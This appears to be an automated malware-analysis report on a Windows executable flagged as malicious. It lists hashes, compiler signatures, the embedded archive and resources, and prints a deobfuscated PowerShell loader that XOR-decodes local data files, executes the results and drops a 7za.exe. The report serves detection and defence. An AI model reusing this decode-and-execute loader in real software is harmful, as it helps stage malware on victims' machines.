Malicious

2eb933d559c31066afbc930757b884a7

PE Executable | MD5: 2eb933d559c31066afbc930757b884a7 | Size: 2.35 MB | application/x-dosexec

Characteristics
Hash
Hash Value
MD5
2eb933d559c31066afbc930757b884a7
Sha1
cb7ac5e5e329336f1c4ac70918d4c11040745c82
Sha256
3cd2ca1a45a96733269d60397d84b451e4b4f0b7f7cdc3c152bf9e88db773199
Sha384
e170c7086a3a5acdd335ec01f5ea05706ae0e976d58281f9bdf5d613e28bd6768f740e2f5aa2d8ad2cc5cc23de91c37a
Sha512
aaa43afece1525b86b2161509cd89068395edaab28afe27bc9ae8f6cf027bab78e5d0dbb9c1c75ca059e98187e39c188ea1bb3c0ee93c1de3c3d30170021adf7
SSDeep
49152:xgwRWCatzqbMLZRRmz4RC8QvCI9BsNapVi4BMY82IrE3rz2oSeYL:xgwR2qbMrRG4RCfvCI9BsuVi4WDrazOL
TLSH
92B533017BF884F1E2AC2C7851A126A296B9ADA2073641D3D7513DC295B32F0E73F7D9

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
7z-stream @ 0x00022CA1.7z
Malicious
data1.bin
data2.bin
data3.bin
[Deobfuscated PS]
Malicious
Overlay_adf99851.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
ID:1033-preview.png
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Information
Name | Value
Info | PE Detect: PeReader OK (file layout)
Info | Overlay extracted: Overlay_adf99851.bin (2205629 bytes)

Artefacts
Name
Value
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1]
function encode($data, [int] $key)
    $step = ($key -Rem 10) + 1
    $len = 0
    return $data | ForEach-Object
        $key = ($key -Rem 255) + 1
        $_ -bxor $key
        $key += $step
        $len
if (Test-Path "data5.bin" -PathType "Leaf") {
    $binaryData = [File]::"ReadAllBytes"("data5.bin")
    $encodedData = encode -data $binaryData -key 26350
    Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData))
}
if (Test-Path "data.bin") {
    $binaryData = [File]::"ReadAllBytes"("data.bin")
    $encodedData = encode -data $binaryData -key 26350
    & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData)))
}
$binaryData = [File]::"ReadAllBytes"("data1.bin")
$encodedData = encode -data $binaryData -key 26350
[File]::"WriteAllBytes"("7za.exe", $encodedData)

Characteristics
No malware configuration was found at this point.
Malicious

2eb933d559c31066afbc930757b884a7 > 7z-stream @ 0x00022CA1.7z > setup.cmd
